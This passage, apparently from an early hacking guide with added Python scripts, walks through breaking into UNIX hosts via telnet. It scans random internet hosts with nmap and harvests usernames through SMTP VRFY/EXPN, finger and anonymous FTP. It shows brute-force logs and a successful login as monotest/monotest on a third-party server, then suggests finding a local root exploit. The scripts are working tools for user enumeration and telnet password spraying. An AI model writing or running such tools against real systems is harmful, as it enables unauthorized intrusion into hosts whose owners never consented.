The most prized port to find open could be the telnet port. An open telnet
port usually denotes a UNIX host or a router; sometimes an AS400 or a
mainframe turns up. Why are we excited about an open telnet port? The
reason is twofold. First, the host may contain sensitive data in
directories that are not properly protected - see the section on "finding
the goods". Second, UNIX hosts are the ideal "relaunch" platform. What I
mean by this is that you should be able to upload your entire "toolbox" to
the server, and from there attack hosts that are usually firewalled or not
routed from the Internet. Even if you are not able to upload a toolbox you
should be able to telnet to other (internal) servers from a router or a
UNIX server. How do we go about getting a shell (or a router prompt)?
Usually a username and a password are required. In some cases only a
username is needed, and in some cases only a password is needed (Cisco
routers protected by nothing but a line password, for instance). The
bottom line is that we need at most two "things" - a username and/or a
password. How do we find them? There are some techniques to find a
username (many of these were used in our previous penetration testing
example, so I will not show input/output):
1. Some routers or UNIX hosts will tell you when you have entered an
incorrect username - even if you don't provide a password.
2. Telnet to port 25 and try to issue EXPN and VRFY commands. Try to
expand (EXPN) list-like aliases such as abuse, info, list, all etc. In
many cases these point to valid usernames.
3. Try to finger a user on the host. Later in this document we will look
at finger techniques :)
4. Try anonymous FTP and get the password file from /etc. Although it
should be shadowed, it may still reveal valid usernames.
5. Try anonymous FTP and do a "cd ~user_to_test_for" - see the section on
FTP.
6. Use default usernames. A nice list of default usernames and passwords
can be found at www.nerdnet.com/security/index.php
7. Try common usernames such as "test", "demo", "test01" etc.
8. Use the host name or a derivative of the host name as username.
9. See if the host is running a web server and have a look at the website
- you might learn more than you expect - look at the "Contact" section
and see if you can't mine some usernames. Looking at the website may
also help you to guess common usernames.
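The list above is a procedure: build a pile of candidate names from cheap sources, then confirm as many as possible without touching the login prompt. The script below is an added example (not code from the original paper) that does exactly that for techniques 2, 7, 8 and 9: it derives names from the host name, merges them with common names and anything mined from a web site, and then checks them against a mail daemon with VRFY and EXPN, classifying the reply codes so a Sendmail "252 cannot VRFY" is not mistaken for a hit. The common-name list, the alias list, the derivation rules and the host you point it at are all assumptions.

```python
"""Build the candidate username list the techniques above describe and
check it over SMTP with VRFY/EXPN (technique 2).  Added example, not code
from the original paper; the common-name list, the alias list, the host
name derivations and the live host argument are assumptions."""
import re
import smtplib

COMMON_USERS = ["test", "demo", "test01", "guest", "admin", "user", "operator"]
LIST_ALIASES = ["abuse", "info", "list", "all", "postmaster", "staff"]

def hostname_derivatives(fqdn):
    """Technique 8: the first label of the host name and derivatives of it,
    e.g. 'force.xxx.com' -> 'force', 'force1', 'forceadm', ..."""
    label = re.sub(r"[^a-z0-9]", "", fqdn.split(".")[0].lower())
    if not label:
        return []
    return [label, label + "1", label + "adm", label + "admin", label + "user", "adm" + label]

def candidate_usernames(fqdn, mined=()):
    """Names mined from the web site (technique 9) first, then the common
    names (technique 7), then host-derived names; duplicates dropped."""
    names = [n.strip().lower() for n in list(mined) + COMMON_USERS + hostname_derivatives(fqdn)]
    return list(dict.fromkeys(n for n in names if n))

def classify_smtp_reply(code):
    """What a VRFY/EXPN reply code says about the name: 250 confirmed;
    252 (or 251) the server will not say, which is what Sendmail returns
    with PrivacyOptions=novrfy; 550/551/553 no such user; 500/502 the
    command is disabled, so stop asking."""
    if code == 250:
        return "valid"
    if code in (550, 551, 553):
        return "invalid"
    if code in (500, 502):
        return "disabled"
    return "unknown"

def parse_expn_members(text):
    """Login names out of a multi-line EXPN reply such as
    b'250-Joe Bloggs <joe@host>\\n250 Ann <ann>'."""
    members = []
    for line in text.decode(errors="replace").splitlines():
        m = re.search(r"<([^@>\s]+)(?:@[^>]*)?>", line)
        if m:
            members.append(m.group(1).lower())
    return members

def enumerate_over_smtp(host, names, aliases=LIST_ALIASES, timeout=10):
    """Live: VRFY each candidate, EXPN each list alias and add the members.
    Returns {name: 'valid' | 'invalid' | 'unknown'}; gives up on the
    first 'disabled' reply since nothing further will be learned."""
    results = {}
    with smtplib.SMTP(host, 25, timeout=timeout) as smtp:
        smtp.ehlo_or_helo_if_needed()
        for name in names:
            code, _ = smtp.verify(name)
            status = classify_smtp_reply(code)
            if status == "disabled":
                break
            results[name] = status
        for alias in aliases:
            code, text = smtp.expn(alias)
            if code == 250:
                for member in parse_expn_members(text):
                    results.setdefault(member, "valid")
    return results
```

Usage against a live target would be enumerate_over_smtp("mail.example.com", candidate_usernames("mail.example.com", mined=["webmaster"])); the names that come back "valid" go straight into the password-guessing list, the "unknown" ones still have to be tested at the login prompt.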
Ok, so now you have a rather long list of possible usernames. The next
step is to verify that these users exist, and it is a bonus if you can do
so without ever touching the login prompt (finger, VRFY, ftp "cd ~user").
If we cannot verify a user any other way we have to test it via the telnet
protocol itself. We still need a password, and unfortunately there is no
way to verify a password other than to try it. Manually?! I don't think
so! BindView Corporation's RAZOR security team provided the world with
VLAD (get it here: http://razor.bindview.com/tools/vlad/), a package of
some very useful tools. One of these has the ability to test usernames and
passwords for (amongst other things) telnet. (The tool does not support
password-only telnet daemons, such as some routers, but the author tells
me they are looking into it.) Without getting too involved in this tool,
let's see how our technique works against an arbitrary host. To find a
totally arbitrary host we use nmap to pick random targets and check them
for an open port 23:
nmap -sT -iR -p 23
(Current nmap versions want a count after -iR, e.g. "-iR 1000".) Nmap
finds the site 216.xxx.162.79 open to telnet:
/tmp# telnet 216.xxx.162.79
Trying 216.xxx.162.79...
Connected to 216.xxx.162.79.
Escape character is '^]'.
SunOS 5.6
xxx.xxx.com
Welcome to xxxxxxxxxxxxx
force Running Solaris 2.6.0
login:
We telnet to port 25 and find that no mail daemon is running - no EXPN or
VRFY possibilities. There is no anonymous FTP either - no getting the
password file. The finger daemon is also not running. Let us leave this
host alone - we don't want to offend XXX; they have implemented some
measures to keep people out.
Another IP that nmap gives us is 216.xxx.140.132. This host (SCO UNIX) is
running Sendmail and finger. When we do a finger command, we find many
usernames. To get these into a single file we issue the following command:
finger @216.xxx.140.132 | awk 'NR>2 {print $1}' | sort -u > usernames
(NR>2 skips the "[host]" banner line and the column header that finger
prints before the listing; sort -u is used rather than plain uniq, since
uniq only collapses duplicates that are adjacent, and a user logged in on
several ttys is not necessarily listed on consecutive lines.)
The next step would be to see if we can use these usernames with common
passwords. We use VLAD's brute-force telnet module as follows:
perl pwscan.pl -v -T 216.xxx.140.132
with the usernames in the file account.db. The output of the pwscan.pl Perl
script looks like this:
/ports/vlad-0.7.1# perl pwscan.pl -v -T 216.xxx.140.132
RAZOR password scanner - version: $Id: pwscan.pl,v 1.17 2000/07/24 17:14:43
loveless Exp $
Checking 216.xxx.140.132
telnet check. User:angela, pass:angela
telnet check. User:angela, pass:
telnet check. User:angela, pass:12345
telnet check. User:angela, pass:abcdef
telnet check. User:angela, pass:god
telnet check. User:angela, pass:guess
telnet check. User:angela, pass:none
telnet check. User:angela, pass:password
telnet check. User:angela, pass:qwerty
telnet check. User:angela, pass:secret
telnet check. User:angela, pass:sex
telnet check. User:angela, pass:test
---cut---
Running through all usernames and common passwords, we find... nothing. No
username could be brute-forced. Now what? The next step is to find more
usernames. We try the following:
finger test@216.xxx.140.132
The output looks like this:
/tmp# finger test@216.xxx.140.132
[216.xxx.140.132]
Login name: test In real life: TEST ACCOUNT
Directory: /home/test Shell: /OpenServer/bin/sh
Never logged in.
No unread mail
No Plan.
Login name: monotest In real life: Monorail Test
Directory: /home/monotest Shell: /OpenServer/bin/sh
Last login Fri Aug 4 12:10 on pts038 from www.multiuser.cH
No unread mail
No Plan.
This looks promising. The "test" user does not seem to have a weak password
- we test it manually. The "monotest" user, however, delivers: logging in
with username "monotest" and password "monotest" we gain access to the UNIX
host:
/tmp# telnet 216.xxx.140.132
Trying 216.xxx.140.132...
Connected to xxxx.com.
Escape character is '^]'.
SCO UnixWare 7.1.0 (xxxx) (pts/42)
login: monotest
Password:
UnixWare 7.1.0
musapp
Copyright (c) 1976-1998 The Santa Cruz Operation, Inc. and its suppliers.
All Rights Reserved.
RESTRICTED RIGHTS LEGEND:
When licensed to a U.S., State, or Local Government,
all Software produced by SCO is commercial computer software
as defined in FAR 12.212, and has been developed exclusively
at private expense. All technical data, or SCO commercial
computer software/documentation is subject to the provisions
of FAR 12.211 - "Technical Data", and FAR 12.212 - "Computer
Software" respectively, or clauses providing SCO equivalent
protections in DFARS or other agency specific regulations.
Manufacturer: The Santa Cruz Operation, Inc., 400 Encinal
Street, Santa Cruz, CA 95060.
Last login: Fri Aug 4 12:10:15 2000 on pts038
NOTICE: Unregistered SCO software is installed on your system. Please
refer to SCO's online help for registration information.
$ exit
The interesting thing about this is that the finger daemon returns every
account whose login name (or real name) contains the word "test" - we asked
for "test" and got "monotest" as well. In the same way we can finger
"admin" or "user" and get interesting results.
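The awk/uniq one-liner earlier and the "finger test@host" trick both come down to the same thing: turning finger output into a clean list of login names. The script below is an added example (not code from the original paper) that does this for both formats finger produces, the short listing from "finger @host" and the long "Login name:" records a substring query returns (the test/monotest output above), while dropping the "[host]" banner, the column header, "No one logged on." and non-adjacent duplicates, which the uniq pipeline does not. It also carries a minimal finger client and a harvest() routine that runs the seed-word queries the text suggests. The sample strings are constructed to mirror the formats shown in the text; the host address and the seed words are assumptions.

```python
"""Turn raw finger output into a clean login-name list.  This is what the
'finger @host | awk | uniq' one-liner in the text is after, but it also
copes with the long 'Login name:' records a substring query returns (the
test/monotest output above), the '[host]' banner, the column header, the
'No one logged on.' message, and duplicates that are not adjacent.
Added example, not code from the original paper.  The sample strings are
constructed to mirror the formats shown in the text; the host address and
seed words in harvest() are assumptions."""
import re
import socket

_LONG_RECORD = re.compile(r"^Login(?: name)?:\s*(\S+)", re.IGNORECASE)
_HOST_BANNER = re.compile(r"^\[[^\]]*\]\s*$")
_NOT_A_LISTING = ("no one logged", "no such user", "finger:")

def finger_query(host, query="", timeout=10):
    """RFC 1288 client: connect to tcp/79, send the query plus CRLF and read
    until the server closes.  An empty query lists logged-in users; a word
    such as 'test' makes classic daemons return every account whose login
    or real name contains it.  Live network call, not run by the tests."""
    with socket.create_connection((host, 79), timeout=timeout) as s:
        s.sendall(query.encode() + b"\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")

def extract_logins(text):
    """Return the unique login names in first-seen order, lower-cased."""
    lines = [ln.rstrip() for ln in text.splitlines()]
    # Long format: one 'Login name: xxx' (SCO/Solaris) or 'Login: xxx'
    # (Linux) line per account; everything else in the record is noise.
    names = [m.group(1) for m in map(_LONG_RECORD.match, lines) if m]
    if not names:
        # Short format: one account per line, login name in column one.
        for ln in lines:
            if not ln.strip() or _HOST_BANNER.match(ln):
                continue
            if ln.lower().startswith(_NOT_A_LISTING):
                continue
            first = ln.split()[0]
            if first.lower() == "login":      # the column header
                continue
            names.append(first)
    return list(dict.fromkeys(n.lower() for n in names))

def harvest(host, seeds=("test", "admin", "user", "guest")):
    """Empty listing plus one substring query per seed word, merged."""
    names = []
    for query in ("",) + tuple(seeds):
        names += extract_logins(finger_query(host, query))
    return list(dict.fromkeys(names))

# Constructed samples in the two formats seen in the text.
SAMPLE_SHORT = """[192.0.2.10]
Login       Name               TTY         Idle    When    Where
root        Super-User         console        2:45 Fri 10:43
angela      Angela Smith       pts/1             - Fri 11:02 host.example
root        Super-User         pts/3            12 Fri 11:30
"""
SAMPLE_LONG = """[192.0.2.10]
Login name: test                        In real life: TEST ACCOUNT
Directory: /home/test                   Shell: /OpenServer/bin/sh
Never logged in.
No Plan.
Login name: monotest                    In real life: Monorail Test
Directory: /home/monotest               Shell: /OpenServer/bin/sh
No Plan.
"""
```

harvest("216.xxx.140.132") would have produced "monotest" on the first pass here, because the "test" seed query pulls in every account containing that substring, which is the observation the text makes by hand.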
Most machines that run telnet and have more than a certain number of users
(mostly multi-user machines) almost always host users with weak or no
passwords - the idea is just to find them. From here it is fairly certain
that you will find a local SCO exploit that will elevate you to root.
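The wordlist run above missed monotest/monotest because it never tried the login name as the password. The script below is an added example (not VLAD's pwscan.pl and not code from the original paper) of the guessing order that finds such "joe accounts" first: per-account guesses (the login name itself, an empty password, the name reversed or with a digit), then a short common list, stopping on the first hit for each user. The telnet driver is a minimal raw-socket client that refuses every option the daemon proposes and then watches for the prompts; it treats "Last login:" in the MOTD as harmless and only a trailing "login:" re-prompt or "Login incorrect" as failure. The prompt strings, the common-password list and the SCO_BANNER sample are assumptions/constructed.

```python
"""Ordered password guessing over telnet for a harvested user list.  The
text finds monotest/monotest by hand after a wordlist run failed; this
puts the per-account guesses (login name itself, empty, reversed, with a
digit) ahead of the common list so a 'joe account' falls on the first
attempt, and stops guessing a user once it succeeds.  Added example, not
VLAD's pwscan.pl; the prompt strings, common-password list and the
SCO_BANNER sample are assumptions/constructed."""
import socket

IAC, DONT, DO, WONT, WILL = 255, 254, 253, 252, 251
COMMON_PASSWORDS = ["", "password", "12345", "qwerty", "secret", "test", "abc123"]

def guesses_for(user):
    """Per-account guesses first, then the shared list; order matters since
    every attempt costs a full telnet session and may count toward lockout."""
    per_user = [user, "", user[::-1], user + "1", user + "123", user.capitalize()]
    return list(dict.fromkeys(per_user + COMMON_PASSWORDS))

def classify(text):
    """What the bytes after the password mean: 'fail' on 'Login incorrect'
    or a fresh login prompt, 'shell' when the output ends in a prompt
    character, else 'unknown' (still reading).  'Last login:' in the MOTD
    is not a failure, which is why only a trailing 'login:' counts."""
    low = text.lower().rstrip()
    if "incorrect" in low or "login failed" in low or low.endswith("login:"):
        return "fail"
    if low.endswith(("$", "#", "%", ">")):
        return "shell"
    return "unknown"

def _negotiate(sock, data):
    """Remove IAC sequences from data, answering DO with WONT and WILL with
    DONT so telnetd gives up negotiating and prints the login prompt."""
    clean, i = bytearray(), 0
    while i < len(data):
        if data[i] == IAC and i + 2 < len(data) and data[i + 1] in (DO, DONT, WILL, WONT):
            verb, opt = data[i + 1], data[i + 2]
            if verb == DO:
                sock.sendall(bytes([IAC, WONT, opt]))
            elif verb == WILL:
                sock.sendall(bytes([IAC, DONT, opt]))
            i += 3
        elif data[i] == IAC and i + 1 < len(data):
            i += 2                       # other two-byte IAC commands
        else:
            clean.append(data[i])
            i += 1
    return bytes(clean)

def _read_until(sock, done, timeout=8):
    """Accumulate decoded output until done(text) is true, EOF or timeout."""
    sock.settimeout(timeout)
    buf = b""
    while not done(buf.decode(errors="replace")):
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            break
        if not chunk:
            break
        buf += _negotiate(sock, chunk)
    return buf.decode(errors="replace")

def telnet_login(host, user, password, port=23):
    """Single attempt; True only if a shell prompt follows the credentials."""
    ends_with = lambda *m: (lambda t: t.lower().rstrip().endswith(m))
    with socket.create_connection((host, port), timeout=10) as s:
        _read_until(s, ends_with("login:", "username:"))
        s.sendall(user.encode() + b"\r\n")
        reply = _read_until(s, lambda t: ends_with("password:")(t) or classify(t) != "unknown")
        if classify(reply) != "unknown":     # no password asked, or rejected outright
            return classify(reply) == "shell"
        s.sendall(password.encode() + b"\r\n")
        reply = _read_until(s, lambda t: classify(t) != "unknown")
    return classify(reply) == "shell"

def spray(users, attempt=None, host=None, max_per_user=None):
    """Try guesses_for(user) in order through attempt(user, pw); the default
    attempt is telnet_login against host.  Returns {user: password} hits."""
    if attempt is None:
        attempt = lambda u, p: telnet_login(host, u, p)
    found = {}
    for user in users:
        for pw in guesses_for(user)[:max_per_user]:
            if attempt(user, pw):
                found[user] = pw
                break
    return found

# Constructed post-login output in the shape of the SCO session above.
SCO_BANNER = ("UnixWare 7.1.0\nmusapp\n"
              "Last login: Fri Aug 4 12:10:15 2000 on pts038\n"
              "NOTICE: Unregistered SCO software is installed on your system.\n$ ")
```

Against the host in the text the call would be spray(["test", "monotest"], host="216.xxx.140.132"); the attempt callback is pluggable so the same ordering can drive any other login channel, and max_per_user caps the attempts where an account lockout policy is suspected.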